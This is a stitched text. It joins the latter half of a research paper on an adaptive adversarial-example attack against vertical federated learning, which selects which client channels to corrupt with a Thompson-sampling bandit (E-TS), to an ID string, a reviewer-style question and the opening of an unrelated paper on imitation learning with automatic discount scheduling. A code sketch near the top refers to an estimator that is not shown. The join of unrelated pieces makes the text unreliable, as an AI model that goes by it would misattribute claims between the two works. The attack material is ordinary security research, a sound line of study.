11: Choose the arm \( k(t) = \arg\max_k \theta_k \) and set the corruption pattern \( C^t = k(t). \)
12: Sample a batch of \( B^t \) test samples, play the arm \( k(t) \) as the corruption pattern in Algorithm 2, and observe the reward \( r_{k(t)}(t) \) from the attack result for the corrupted embeddings \( \tilde{h}_{i,a}^t \), where \( h_{i,a}^t = [h_{i,a_1}^t, \ldots, h_{i,a_C}^t], \forall i \in [B^t]. \)
13: Update \( n_{k(t)} = n_{k(t)} + 1 \), \( \hat{\mu}_{k(t)} = \frac{\hat{\mu}_{k(t)}(n_{k(t)}-1)+r_{k(t)}(t)}{n_{k(t)}} \), \( \hat{\sigma}_{k(t)} = \frac{1}{n_{k(t)}+1} \), \( r_{k(t)}^{\text{max}} = \max\{r_{k(t)}^{\text{max}}, r_{k(t)}(t)\} \), \( \hat{\varphi}_{k(t)} = \frac{\hat{\varphi}_{k(t)}(n_{k(t)}-1)+r_{k(t)}^{\text{max}}}{n_{k(t)}} \).
14: **end for**
15: Output \( \{k(1), \ldots, k(T)\} \)
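A minimal sketch of the NES estimator above together with a PGD-style update; the toy quadratic stands in for the query-only loss \( l(f_0(\tilde{h}_{i,a}; h_{i,b}), y_v) \), and all names are illustrative.

```python
import numpy as np

def nes_gradient(loss_fn, eta, n=50, sigma=0.01):
    """NES zeroth-order estimate: (1/(sigma*n)) * sum_j delta_j * L(eta + sigma*delta_j),
    using only loss values, as required in the query-only VFL setting."""
    grad = np.zeros_like(eta)
    for _ in range(n):
        delta = np.random.randn(*eta.shape)
        grad += delta * loss_fn(eta + sigma * delta)
    return grad / (sigma * n)

loss_fn = lambda eta: float(np.sum(eta ** 2))   # toy stand-in for the queried loss
eta = np.ones(16)
for _ in range(10):                             # at most floor(Q/n) updates per sample
    eta -= 0.1 * nes_gradient(loss_fn, eta)     # PGD-style descent step
    eta = np.clip(eta, -0.5, 0.5)               # project back into the feasible box
```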
### 5.2 Thompson sampling with the empirical maximum reward for solving the CPS problem

To solve the CPS problem, we make the key observation that the outer problem in (4) can be cast as an MAB problem. Specifically, picking \( C \) out of a total of \( M \) clients to corrupt results in \( N = \binom{M}{C} \) possible corruption patterns, which are defined as the \( N \) arms in the MAB problem. That is to say, there is a bijection between the set of \( N \) arms and the optimization space of \( C^t \). Therefore, we can transform the optimization variables \( \{C^t\}_{t=1}^{T} \) into the arms selected at each round \( t \), i.e., \( \{k(t)\}_{t=1}^{T} \). At round \( t \), pulling an arm \( k(t) \) returns the ASR as the reward, i.e., \( r_{k(t)}(t) = A^*(C^t; B^t) \in [0, 1] \). We define the mean of the reward for arm \( k(t) \) as \( \mathbb{E}[r_{k(t)}(t)] = \mu_{k(t)} = \mathbb{E}[A^*(C^t; B^t)] \). Without loss of generality, we designate arm 1 as the best arm, with fixed positive mean \( \mu_1 > 0 \), which can serve as the positive constant \( \alpha^* \) in (4). Finally, the CPS problem in (4) is transformed into an MAB problem, i.e., \( \min_{\{k(t)\}_{t=1}^{T}} \mathbb{E}\left[ \sum_{t=1}^{T} (\mu_1 - \mu_{k(t)}) \right] \).

**E-TS algorithm.** In our context, the adversary could face a significant challenge, as the exploration space \( N \) can become prohibitively large when engaging with hundreds of clients, which could result in a steep accumulation of regret. To mitigate the issue of extensive exploration, we first introduce the following definition of a competitive arm.

**Definition 1 (Competitive arm).** An arm \( k \) is called a competitive arm when its expected maximum reward is no smaller than the best arm's mean, i.e., \( \tilde{\Delta}_{k,1} = \frac{\sum_{t=1}^{T} \mathbb{E}[r_{k}^{\text{max}}(t)]}{T} - \mu_1 \geq 0 \), where \( r_{k}^{\text{max}}(t) = \max_{\tau \in [t]} \{r_{k}(\tau)\} \). Otherwise, it is a non-competitive arm.

Based on the above definition, we propose the Thompson sampling with Empirical maximum reward (E-TS) algorithm. The basic idea of E-TS is to restrict the exploration space to the set of competitive arms to reduce accumulated regret. However, the ground-truth competitive arms cannot be known a priori. Therefore, we propose to construct an empirical competitive set $\mathcal{E}^t$ of estimated competitive arms at each round $t$ and to restrict exploration within it. Estimating the competitive arms requires calculating the empirical best arm and the empirical maximum reward, defined as follows.

**Definition 2 (Empirical best arm and empirical maximum reward).** An arm $k$ is selected as the empirical best arm $k_{emp}(t)$ at round $t$ when $k = \arg\max_{k \in \mathcal{S}^t} \hat{\mu}_k(t)$, where $\hat{\mu}_k(t)$ is the estimated mean of arm $k$'s reward at round $t$, $\mathcal{S}^t = \{k \in [N] : n_k(t) \geq \frac{(t-1)}{N}\}$, and $n_k(t)$ denotes the number of times arm $k$ is pulled in $t$ rounds. An arm $k$'s empirical maximum reward $\hat{\varphi}_k(t)$ is computed by:

$$\hat{\varphi}_k(t) := \frac{\sum_{\tau=1}^{t} r_k^{\text{max}}(\tau) \mathbb{I}(k(\tau)=k)}{n_k(t)}.$$

Based on Definitions 1 and 2, we are now able to present the key components of the E-TS algorithm.
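For concreteness, the following is a minimal sketch of one E-TS decision, combining Definitions 1 and 2 with the Gaussian posteriors of Algorithm 1 (variance $1/(n_k+1)$); the data structures and function name are assumptions for illustration.

```python
import numpy as np

def ets_select_arm(mu_hat, phi_hat, n_pulls, t, t0):
    """One round of E-TS arm selection (cf. Algorithm 1): restrict Thompson
    sampling to the empirical competitive set after t0 warm-up rounds."""
    N = len(mu_hat)
    if t > t0:
        explored = [k for k in range(N) if n_pulls[k] >= (t - 1) / N]
        k_emp = max(explored, key=lambda k: mu_hat[k])            # empirical best arm
        E = [k for k in range(N) if phi_hat[k] >= mu_hat[k_emp]]  # competitive set
    else:
        E = list(range(N))                                        # warm-up: plain TS
    # Gaussian posterior N(mu_hat_k, 1/(n_k + 1)); np.random.normal takes a std dev.
    theta = {k: np.random.normal(mu_hat[k], np.sqrt(1.0 / (n_pulls[k] + 1))) for k in E}
    return max(theta, key=theta.get)   # chosen arm, i.e., the corruption pattern C^t
```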
E-TS consists of two steps. First, to construct an empirical competitive set $\mathcal{E}^t$ at round $t$, E-TS estimates $\mu_1$ and $\frac{1}{t}\sum_{\tau=1}^{t} \mathbb{E}[r_k^{\text{max}}(\tau)]$ using the mean of the empirical best arm $\hat{\mu}_{k_{emp}(t)}(t)$ and the empirical maximum reward $\hat{\varphi}_k(t)$, and obtains $\mathcal{E}^t = \{k \in [N] : \hat{\varphi}_k(t) - \hat{\mu}_{k_{emp}(t)}(t) \geq 0\}$. Second, while performing TS to explore each arm, E-TS adopts a Gaussian prior $\mathcal{N}(\hat{\mu}_k(t), \frac{1}{n_k(t)+1})$ to approximate the distribution of the reward, where $\hat{\mu}_k(t)$ is defined as $\hat{\mu}_k(t) := \frac{\sum_{\tau=1}^{t} r_k(\tau) \mathbb{I}(k(\tau)=k)}{n_k(t)}$. In addition to the above two steps, E-TS also involves $t_0$ warm-up rounds, in which it simply executes TS across all arms. These warm-up rounds are designed to facilitate a more accurate estimation of each arm's reward mean and expected maximum reward. The complete algorithm is presented in Algorithm 1.

**Remark 1.** Previous work (Gupta et al., 2021) leverages an upper bound $s_{k,l}(r)$ on arm $k$'s reward conditioned on obtaining reward $r$ from pulling arm $l$ (i.e., $\mathbb{E}[r_k(t)|r_l(t)=r] \leq s_{k,l}(r)$) to reduce the exploration space, where $s_{k,l}(r)$ is a known constant. In contrast, the proposed E-TS algorithm does not require any prior information about reward upper bounds, making it more practical.

## 6 REGRET ANALYSIS

In this section, we analyze the regret bound of the proposed E-TS algorithm. Prior to the proof, we assume that each arm is pulled at least twice during the initial warm-up rounds. This assumption aligns with our analysis of the optimal choice of warm-up rounds detailed in Appendix C.6. It holds with high probability as the number of warm-up rounds increases asymptotically (Agrawal and Goyal, 2017); additionally, an adversary can traverse all arms before running E-TS to ensure this prerequisite is met. To facilitate the discussion, we first introduce two key lemmas, and then present the expected regret bound of the E-TS algorithm in Theorem 1. We defer all proof details of the lemmas and the theorem to Appendix B.

**Lemma 1 (Expected pulling times of a non-competitive arm).** Under the above assumption, for a non-competitive arm $k^{nc} \neq 1$ with $\tilde{\Delta}_{k^{nc},1} < 0$, the expected number of pulls in $T$ rounds, i.e., $\mathbb{E}[n_{k^{nc}}(T)]$, is bounded by $\mathbb{E}[n_{k^{nc}}(T)] \leq O(1)$.

**Lemma 2 (Expected pulling times of a competitive but sub-optimal arm).** Under the above assumption, the expected number of times a competitive but sub-optimal arm $k^{sub}$ with $\tilde{\Delta}_{k^{sub},1} \geq 0$ is pulled in $T$ rounds is bounded as follows:

$$\mathbb{E}[n_{k^{sub}}(T)] = \sum_{t=1}^{T} \Pr(k(t) = k^{sub}, n_1(t) \geq \frac{t}{N}) \leq O(\log(T)).$$

**Theorem 1 (Upper bound on expected regret of E-TS).** Let $D \leq N$ denote the number of competitive arms. Under the above assumption, the expected regret of the E-TS algorithm is upper bounded by $DO(\log(T)) + (N-D)O(1)$. Since the rewards lie in $[0,1]$, each gap $\Delta_k \leq 1$, so summing $\Delta_k \mathbb{E}[n_k(T)]$ over the $N-D$ non-competitive arms (Lemma 1) and the competitive but sub-optimal arms (Lemma 2) in the regret decomposition of Section 2 yields the bound.

**Proof sketch.** We first demonstrate that the probability of the optimal arm being pulled infrequently (i.e., $n_1(t) < \frac{(t-1)}{N}$) is bounded. Next, we categorize the sub-optimal arms into non-competitive arms and competitive but sub-optimal arms, and analyze their regret bounds respectively.
For a non-competitive arm $k^{nc}$, the probability of $k(t) = k^{nc}$ is bounded by the probability of it being selected into the empirical competitive set, i.e., $\Pr(k^{nc} \in \mathcal{E}^t)$, which is further bounded as in Lemma 1. On the other hand, for a competitive but sub-optimal arm $k^{sub}$, we further divide the analysis into two cases based on whether or not the optimal arm is included in $\mathcal{E}^t$. By combining the probability upper bounds in these two cases, we arrive at an upper bound on the probability of $k(t) = k^{sub}$, as in Lemma 2.

**Remark 2.** In comparison with plain TS, our proposed E-TS holds a significant advantage in limiting the expected number of times a non-competitive arm is pulled, which is reduced from $O(\log(T))$ to $O(1)$.

## 7 EXPERIMENTAL EVALUATIONS

### 7.1 SETUP

The proposed attack is implemented using the PyTorch framework [Paszke et al., 2017], and all experiments are executed on a single machine equipped with four NVIDIA RTX 3090 GPUs. Each experiment is repeated for 10 trials, and the average values and their standard deviations are reported.

**Datasets.** We perform experiments on six datasets covering four distinct types of VFL tasks. 1) Tabular datasets: Credit [Yeh and Lien, 2009] and Real-Sim [Chang and Lin, 2011], where data features are equally partitioned across 6 and 10 clients, respectively; 2) Computer vision (CV) datasets: FashionMNIST [Xiao et al., 2017] and CIFAR-10 [Krizhevsky et al., 2009], with features equally distributed across 7 and 8 clients, respectively; 3) Multi-view dataset: Caltech-7 [Li et al., 2022], which consists of 6 views, each held by a separate client; 4) Natural language dataset: IMDB [Maas et al., 2011], where each complete movie review is partitioned among 6 clients, each possessing a subset of sentences. More details about the datasets and model structures are provided in Appendix C.1.

**Baselines.** We consider three baseline strategies for corruption pattern selection: 1) Fixed corruption pattern, where the adversary corrupts a fixed set of clients during inference. For comparison, we consider two fixed corruption patterns, where one is the underlying optimal pattern with the highest ASR, and the other is randomly selected at the beginning of the attack; 2) Random corruption (RC), where the adversary selects uniformly at random a set of $C$ clients to corrupt in each attack round; and 3) Plain Thompson sampling (TS), where the adversary executes plain TS to improve the corruption pattern selection.

**Experimental parameter settings.** The adversary can query the server up to $Q = 2000$ times per test sample. The number of warm-up rounds $t_0$ in E-TS is set to 80 for FashionMNIST, CIFAR-10, and Caltech-7, 50 for Credit and Real-Sim, and 40 for IMDB. For the targeted attack, we set the target label to 7 for FashionMNIST and CIFAR-10, and 3 for Caltech-7. We measure the ASR over 30 test epochs, each comprising multiple attack rounds. In our ablation study, we adjust one parameter at a time, keeping the rest constant, with default settings of $C = 2$, $t_0 = 80$, $Q = 2000$, and $\beta = 0.3$.

### 7.2 RESULTS

We plot the ASR of targeted and untargeted attacks for different datasets in Figure 1. Note that the targeted and untargeted attacks are equivalent for Credit, Real-Sim, and IMDB, which have binary labels. We observe that, uniformly across all datasets, the proposed E-TS method effectively attacks VFL models, with an ASR of $38\% \sim 99\%$ for the targeted attack and $41\% \sim 99\%$ for the untargeted attack.
For each attack, we observe a significant gap in ASR between the best and sub-optimal corruption patterns, demonstrating the importance of corruption pattern selection. The RC baseline exhibits a stable yet sub-optimal ASR performance, as it does not leverage any information from historical ASRs. In sharp contrast, the performance of both TS and E-TS converges to that of the best corruption pattern. Notably, thanks to the estimation of the empirical maximum reward, the E-TS algorithm efficiently narrows down the exploration space, achieving much faster and more stable convergence than TS.

**Ablation study.** We evaluate the effects of the system parameters, including the corruption constraint $C$, query budget $Q$, and perturbation budget $\beta$, and of the design parameter, the number of warm-up rounds $t_0$, on the performance of the proposed attack. Besides, we test the attack's performance in larger search spaces. As shown in Figure 3(a), ASR increases as more clients are corrupted, and E-TS consistently outperforms random corruption. Figure 3(b) illustrates that it is critical to select an appropriate number of warm-up rounds $t_0$ at the beginning of E-TS. When $t_0$ is too small, i.e., $t_0 = 20$, it leads to an inaccurate estimate of the empirical competitive set, which may exclude the best arm, causing E-TS to converge on a sub-optimal arm. However, if $t_0$ is too large, i.e., $t_0 = 200$ or 1000, the advantage over plain TS diminishes. That is, one needs to tune $t_0$ to find the optimal arm at the fastest speed. Figures 3(c) and (d) show that ASR generally increases with larger $Q$ and $\beta$. Nevertheless, once $\beta$ reaches 0.3, further increasing the perturbation budget has a negligible effect on improving ASR. Figure 4 shows that E-TS consistently outperforms the baselines in larger exploration spaces, i.e., when there are $\binom{16}{2} = 120$, $\binom{16}{3} = 560$, $\binom{28}{2} = 378$, and $\binom{28}{3} = 3276$ choices. Notably, the performance gap between E-TS and TS becomes even more pronounced as the exploration space expands, demonstrating its effectiveness in handling larger exploration spaces. More experimental results on corrupting different numbers of clients on other datasets are provided in Appendix C.2. We also investigate the dynamics of arm selection and the empirical competitive set in TS and E-TS (Appendix C.3), the minimum query budget and corruption channels needed to achieve 50% ASR (Appendix C.4), the E-TS performance in large exploration spaces (Appendix C.5), and the optimal choice of the warm-up rounds $t_0$ (Appendix C.6).

**Defenses.** We further evaluate the effectiveness of the proposed attack under the following common defense strategies.

- **Randomized smoothing** (Cohen et al., 2019): The main idea is to smooth out the decision boundary of a classifier, such that it is less sensitive to small perturbations in the input data. To construct a smooth VFL classifier, Gaussian noises are added to the clients' embeddings, which are then processed by the top model to make a prediction. The final prediction is obtained by majority voting over 100 such trials;
- **Dropout** (Qiu et al., 2022): A dropout layer is added after each activation layer in the server's top model to improve robustness. Here, we set the dropout rate to 0.3;
- **Manifold projection** (Meng and Chen, 2017; Lindqvist et al., 2018): An autoencoder is incorporated into the model as a pre-processing step before the top model.
During training, the autoencoder is trained on clean embeddings and designed to reconstruct the original embeddings. During inference, the clients' embeddings are first processed by the autoencoder before being passed to the top model for prediction.

As shown in Figure 2, for a targeted attack with $\beta = 0.3$, the ASR of the proposed attack is reduced under all considered defenses; for an untargeted attack with $\beta = 0.1$, the ASRs experience marginal reductions under the randomized smoothing and dropout defenses, but significant drops of $35\% \sim 72\%$ under manifold projection. The advantage of manifold projection can be attributed to its learning of the manifold structure and its transformation of adversarial embeddings into clean embeddings. Overall, while manifold projection exhibits the strongest capability in defending against the proposed attack, it fails to completely eliminate all AEs.

## 8 RELATED WORK

**AE generation for ML models.** AE generation methods can generally be classified into two categories: white-box and black-box settings. While the former assumes the adversary has full knowledge of model parameters and architectures, the latter assumes no prior knowledge of either the models or the training data. Our work is concerned with the black-box setting, which is typically addressed using either transfer-based or query-based solutions. Transfer-based methods (Papernot et al., 2016; Liu et al., 2016) generate AEs using a substitute model, which is trained either by querying the model's output or using a subset of the training data. Query-based methods (Bhagoji et al., 2018; Chen et al., 2017) optimize AEs utilizing gradient information, which is estimated from the queried outputs. One classical example is the ZOO attack (Chen et al., 2017), which employs zeroth-order stochastic coordinate descent for gradient estimation.

**MAB algorithms.** Multiple classical algorithms, such as $\epsilon$-greedy (Sutton and Barto, 2018), Upper Confidence Bounds (UCB) (Lai et al., 1985; Garivier and Cappé, 2011), and Thompson sampling (TS) (Agrawal and Goyal, 2012), have been proposed to solve the MAB problem. Recent advancements have proposed variants of MAB under different settings, leveraging additional information to minimize exploration. These include correlated-arm bandits (Gupta et al., 2021), contextual bandits (Singh et al., 2020; Chu et al., 2011), and combinatorial bandits (Chen et al., 2013). However, their application in the context of adversarial attacks, particularly in VFL, remains largely unexplored.

## 9 CONCLUSION

We propose a novel attack for generating AEs during the inference of VFL models, in which an adversary can adaptively corrupt a bounded number of communication channels between the clients and the server. Specifically, we formulate the problem of adaptive AE generation as an online optimization problem, and decompose it into an adversarial example generation (AEG) problem and a corruption pattern selection (CPS) problem. We transform the CPS problem into an MAB problem, and propose a novel Thompson sampling with Empirical maximum reward (E-TS) algorithm to find the optimal corruption pattern. We theoretically characterize the expected regret bound of E-TS, and perform extensive experiments on various VFL tasks to substantiate the effectiveness of our proposed attack.

## ACKNOWLEDGMENT

This work is in part supported by the National Natural Science Foundation of China (NSFC) Grant 62106057.

## REFERENCES

Tian Li, Anit Kumar Sahu, Ameet Talwalkar, and Virginia Smith.
Federated learning: Challenges, methods, and future directions. *IEEE signal processing magazine*, 37(3):50–60, 2020. Maarten G Poirot, Praneeth Vepakomma, Ken Chang, Jayashree Kalpathy-Cramer, Rajiv Gupta, and Ramesh Raskar. Split learning for collaborative deep learning in healthcare. *arXiv preprint arXiv:1912.12115*, 2019. Priyanka Mary Mammen. Federated learning: opportunities and challenges. *arXiv preprint arXiv:2101.05428*, 2021. Yang Liu, Yan Kang, Tianshan Zou, Yanhong Pu, Yuanqin He, Xiaozhou Ye, Ye Ouyang, Ya-Qin Zhang, and Qiang Yang. Vertical federated learning. *arXiv preprint arXiv:2211.12814*, 2022. Jing Liu, Chulin Xie, Oluwasanmi O Koyejo, and Bo Li. Copur: Certifiably robust collaborative inference via feature purification. In *Advances in Neural Information Processing Systems*. Jong Hwan Ko, Taesik Na, Mohammad Faisal Amir, and Saibal Mukhopadhyay. Edge-host partitioning of deep neural networks with feature space encoding for resource-constrained internet-of-things platforms. In *2018 15th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS)*, pages 1–6. IEEE, 2018. Cheng Shi, Yenan Dang, Li Fang, Minghua Zhao, Zhiyong Lv, Qiguang Miao, and Chi-Man Pun. Multifeature collaborative adversarial attack in multimodal remote sensing image classification. *IEEE Transactions on Geoscience and Remote Sensing*, 60:1–15, 2022. Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. *arXiv preprint arXiv:1412.6572*, 2014. Vuk Lesi, Ilija Jovanov, and Miroslav Pajic. Integrating security in resource-constrained cyber-physical systems. *ACM Transactions on Cyber-Physical Systems*, 4(3):1–27, 2020. Fangfei Li and Yang Tang. False data injection attack for cyber-physical systems with resource constraint. *IEEE transactions on cybernetics*, 50(2):729–738, 2018. Guangyu Wu, Jian Sun, and Jie Chen. Optimal data injection attacks in cyber-physical systems. *IEEE transactions on cybernetics*, 48(12):3302–3312, 2018. Qi Pang, Yuanyuan Yuan, and Shuai Wang. Attacking vertical collaborative learning system using adversarial dominating inputs. *arXiv preprint arXiv:2201.02775*, 2022. Pengyu Qiu, Xuhong Zhang, Shouling Ji, Changjiang Li, Yuwen Pu, Xing Yang, and Ting Wang. Hijack vertical federated learning models with adversarial embedding. *arXiv preprint arXiv:2212.00322*, 2022. Shipra Agrawal and Navin Goyal. Analysis of thompson sampling for the multi-armed bandit problem. In *Conference on learning theory*, pages 39–1. JMLR Workshop and Conference Proceedings, 2012. Kaleel Mahmood, Rigel Mahmood, Ethan Rathbun, and Marten van Dijk. Back in black: A comparative evaluation of recent state-of-the-art black-box attacks. *IEEE Access*, 10:998–1019, 2021. Mauro Conti, Nicola Dragoni, and Viktor Lesyk. A survey of man in the middle attacks. *IEEE communications surveys & tutorials*, 18(3):2027–2051, 2016. Derui Wang, Chaoran Li, Sheng Wen, Surya Nepal, and Yang Xiang. Man-in-the-middle attacks against machine learning classifiers via malicious generative models. *IEEE Transactions on Dependable and Secure Computing*, 18(5):2074–2087, 2020. Dong Wang, Zidong Wang, Bo Shen, Fuad E Alsaadi, and Tasawar Hayat. Recent advances on filtering and control for cyber-physical systems under security and resource constraints. *Journal of the Franklin Institute*, 353(11):2451–2466, 2016.
pPJTQYOpNI
If the goal is to learn to follow earlier parts of trajectories first, and then move forward once the policy learns, why not simply put a scheduler on truncating the expert trajectories, instead of on the discount factor?
IMITATION LEARNING FROM OBSERVATION WITH AUTOMATIC DISCOUNT SCHEDULING

Yuyang Liu\textsuperscript{1,2,*}, Weijun Dong\textsuperscript{1,2,*}, Yingdong Hu\textsuperscript{1,2}, Chuan Wen\textsuperscript{1,2}, Zhao-Heng Yin\textsuperscript{3}, Chongjie Zhang\textsuperscript{4}, Yang Gao\textsuperscript{1,2,5,†}

\textsuperscript{1}Institute for Interdisciplinary Information Sciences, Tsinghua University \textsuperscript{2}Shanghai Qi Zhi Institute \textsuperscript{3}UC Berkeley \textsuperscript{4}Washington University in St. Louis \textsuperscript{5}Shanghai Artificial Intelligence Laboratory

\{yyliu22,dwj22,huyd21,cwen20\}@mails.tsinghua.edu.cn [email protected], [email protected] [email protected]

*Equal Contribution. †Corresponding Author.

ABSTRACT

Humans often acquire new skills through observation and imitation. For robotic agents, learning from the plethora of unlabeled video demonstration data available on the Internet necessitates imitating the expert without access to its actions, presenting a challenge known as Imitation Learning from Observation (ILfO). A common approach to tackle ILfO problems is to convert them into inverse reinforcement learning problems, utilizing a proxy reward computed from the agent's and the expert's observations. Nonetheless, we identify that tasks characterized by a progress dependency property pose significant challenges for such approaches; in these tasks, the agent needs to initially learn the expert's preceding behaviors before mastering the subsequent ones. Our investigation reveals that the main cause is that the reward signals assigned to later steps hinder the learning of initial behaviors. To address this challenge, we present a novel ILfO framework that enables the agent to master earlier behaviors before advancing to later ones. We introduce an Automatic Discount Scheduling (ADS) mechanism that adaptively alters the discount factor in reinforcement learning during the training phase, prioritizing earlier rewards initially and gradually engaging later rewards only when the earlier behaviors have been mastered. Our experiments, conducted on nine Meta-World tasks, demonstrate that our method significantly outperforms state-of-the-art methods across all tasks, including those that are unsolvable by them. Our code is available at \url{https://il-ads.github.io/}

1 INTRODUCTION

Observing and imitating others is an essential aspect of intelligence. As humans, we often learn by watching what other people do. Similarly, robotic agents can learn new skills by watching experts and mimicking them through their observation-action pairs, a method often far more sample-efficient than relying solely on self-guided interactions with the environment. Beyond these conventional demonstrations, there is a vast repository of unlabeled video demonstration data available on the Internet, lacking explicit information on the actions associated with each state. To utilize these valuable resources, we direct our attention to a specific problem known as Imitation Learning from Observation (ILfO; Torabi et al., 2019). In this setting, agents solely have access to sequences of demonstration states without any knowledge of the actions executed by the demonstrator. Canonical imitation algorithms, such as behavior cloning (Bain & Sammut, 1995; Ross et al., 2011; Daftry et al., 2017), cannot be directly applied to ILfO, as they rely on access to the expert's actions for behavior recovery.
To deal with ILfO problems, one prominent category of approaches involves deriving proxy rewards based on the distributions of the agent's and the expert's visited states (Torabi et al., 2018b; Yang et al., 2019; Lee et al., 2021; Kidambi et al., 2021; Jaegle et al., 2021; Liu et al., 2022). These approaches first derive stepwise reward signals through techniques like occupancy measure matching (Ho & Ermon, 2016) or trajectory matching (Haldar et al., 2023a), and then employ reinforcement learning (RL) to optimize the expected cumulative reward. However, the performance of these methods remains unsatisfactory, particularly in challenging manipulation tasks with high-dimensional visual observations, where agents struggle to achieve task completion despite extensive interactions with the environment.

To understand why traditional proxy-reward-based methods fail, we conduct experiments on the basketball task from the Meta-World suite (Yu et al., 2020). As shown in Figure 1, a robotic agent needs to grasp a basketball and deposit it in the basket. We first experiment with a simplified setting, which only instructs the agent to learn the expert's early behaviors of reaching for and grasping the ball. The agent quickly acquires these skills (see Figure 1(a)), indicating that grasping the ball is not inherently difficult and can be learned efficiently. However, when tasked with learning the entire expert demonstration, the same method fails to acquire the initial grasping skill and instead moves the empty gripper directly to the basket (see Figure 1(b)). Comparing these two scenarios, we discover that rewarding later steps in a trajectory negatively impacts the agent's ability to learn the earlier behaviors, which results in difficulties in mastering subsequent actions and the overall task. This pattern is not unique to the basketball task; we observe a similar phenomenon in many manipulation tasks. All these tasks share a common property: the agent must first acquire earlier behaviors before progressing to later ones.

Our research shows that conventional ILfO approaches often struggle with tasks characterized by progress dependencies, primarily because agents fail to mimic the expert's early behaviors. Instead, agents resort to optimizing rewards in later stages by moving to states that appear similar to demonstrated states. However, these states differ from the demonstrated ones because the agent has not yet completed the necessary preliminary steps. Therefore, these locally optimal but incorrect solutions can hinder the agent's exploration of earlier critical behaviors.

Based on this analysis, we introduce a novel ILfO framework to handle tasks with progress dependencies. We propose encouraging the agent to master earlier parts of the demonstrated behaviors before proceeding to subsequent ones. To achieve this, we restrict the impact of later rewards until the agent has mastered the preceding behaviors. We implement this idea in a simple yet effective way by incorporating a dynamic scheduling mechanism for a fundamental term in RL - the discount factor $\gamma$. During the initial training phase, we employ a relatively small $\gamma$, leading to value functions that focus on short-term future rewards. For the initial states, these shortsighted value functions reduce the impact of misleading proxy rewards from the later episode stages, thus facilitating the imitation of early-episode behaviors.
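To see the magnitude of this effect, a quick back-of-the-envelope check (plain Python, illustrative numbers) shows how strongly a low discount suppresses rewards assigned to late steps:

```python
# Discount weight gamma**(t-1) placed on a reward at step t = 50 of an episode.
for gamma in (0.9, 0.99):
    print(gamma, gamma ** 49)  # ~0.0057 for gamma=0.9 vs ~0.61 for gamma=0.99
```

Under gamma = 0.9 a step-50 reward is effectively invisible from the initial state, so misleading proxy rewards from late stages cannot outweigh rewards for imitating early behaviors.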
As the agent advances in the task, the discount factor increases adaptively, allowing the agent to tackle later stages only after it has effectively learned the earlier behaviors. This mechanism, which we call Automatic Discount Scheduling (ADS), is reminiscent of Curriculum Learning (CL) introduced by Bengio et al. (2009), which structures the learning process to gradually increase the complexity of the training objective. Experimental results demonstrate that ADS overcomes the challenges associated with traditional proxy-reward-based methods and surpasses the state of the art on complex Meta-World tasks.

Our contributions are summarized as follows:

- We discover that conventional ILfO algorithms struggle on tasks with progress dependency.
- We introduce a novel ILfO framework featuring Automatic Discount Scheduling (ADS), enabling the agent to master earlier behaviors before advancing to later ones.
- On all of the nine evaluated challenging Meta-World manipulation tasks, our approach significantly outperforms prior state-of-the-art ILfO methods.

2 BACKGROUND

In this section, we delve into the idea of imitation learning through proxy rewards, which is a widely used framework to tackle the ILfO problem. Furthermore, we introduce Optimal Transport (OT), which is the reward labeling technique employed by our method to compute the proxy rewards.

2.1 IMITATION THROUGH PROXY REWARDS

We consider agents acting within a finite-horizon Markov Decision Process \((S, A, P, R, \gamma, p_{\text{init}}, T)\), where \(S\) is the state space, \(A\) is the action space, \(P\) is the transition function, \(R\) is the reward function, \(\gamma\) is the discount factor, \(p_{\text{init}}\) is the initial state distribution, and \(T\) is the time horizon. In image-based tasks, a single frame may not fully describe the environment's underlying state. Following common practice (Mnih et al., 2013; Yarats et al., 2021), we use a stack of 3 consecutive RGB images (denoted by observation \(o_t\)) as an approximation of the current underlying state \(s_t\). We assume that a cost function over the observation space \(c : O \times O \rightarrow \mathbb{R}\) is given. This cost function will be used in reward inference (Section 2.2) and progress recognition (Section 4.2).

In the context of ILfO, the environment does not provide a reward function. Instead, our goal is to train an agent using a set of \(N\) observation-only trajectories denoted as \(D^e = \{\tau^n\}_{n=1}^{N}\), which are demonstrated by an expert. Each trajectory \(\tau^n\) is composed of a sequence of observations \(\tau^n = \{o^n_t\}_{t=1}^{T}\). A prevalent approach to the ILfO problem involves transforming it into a Reinforcement Learning (RL) problem by defining proxy rewards based on the agent's trajectory \(\tau\) and the expert demonstrations: \(\{r_t\}_{t=1}^{T-1} := f_r(\tau, D^e)\), where \(f_r\) represents a criterion for reward assignment (Torabi et al., 2018b; Yang et al., 2019; Lee et al., 2021; Jaegle et al., 2021; Liu et al., 2022; Huang et al., 2023). Subsequently, RL is employed to maximize the expected discounted sum of rewards:

\[ \mathbb{E}_\pi \left[ \sum_{t=1}^{T-1} \gamma^{t-1} r_t \right]. \] (1)

2.2 REWARD LABELING VIA OPTIMAL TRANSPORT

Optimal Transport (OT; Villani et al., 2009) is an approach for measuring the distance between probability distributions. For simplicity, we state its definition in the scope of ILfO.
Given a predefined cost function \(c(\cdot, \cdot)\) over the observation space, we define the Wasserstein distance between an agent trajectory \(\tau = \{o_1, \cdots, o_T\}\) and an expert trajectory \(\tau^e = \{o^e_1, \cdots, o^e_T\}\) as:

\[ W(\tau, \tau^e) = \min_{\mu \in \mathbb{R}^{T \times T}} \sum_{i=1}^{T} \sum_{j=1}^{T} c(o_i, o_j^e) \mu(i, j) \] (2)

subject to

\[ \sum_{i=1}^{T} \mu(i, j) = \frac{1}{T}, \quad \sum_{j=1}^{T} \mu(i, j) = \frac{1}{T}. \] (3)

Each \(\mu \in \mathbb{R}^{T \times T}\) satisfying Equation 3 is called a transport plan. The transport plan that achieves the minimum in Equation 2 is designated as the optimal transport plan \(\mu^*_{\tau, \tau^e}\). We can use OT to derive a proxy reward function for the agent's trajectory $\tau$. Let $\tau^e \in D^e$ be the expert trajectory with minimal Wasserstein distance to $\tau$. The rewards $\{r_t\}_{t=1}^{T-1}$ are assigned by:

$$r_i = - \sum_{j=1}^{T} c(o_i, o_j^e) \mu^*_{\tau, \tau^e}(i, j)$$ (4)

Due to its practicality and efficacy, OT has become a widely used approach for calculating rewards (Arjovsky et al., 2017; Papagiannis & Li, 2022; Luo et al., 2023; Haldar et al., 2023a,b).

3 CHALLENGES IN ILfO ON TASKS WITH PROGRESS DEPENDENCY

In this section, we provide further discussion of the basketball task illustrated in Section 1. We elaborate on why a proxy-reward-based method (see Section 2.1) fails to solve this task, and conclude that this phenomenon reveals a unique challenge for ILfO on tasks with progress dependency.

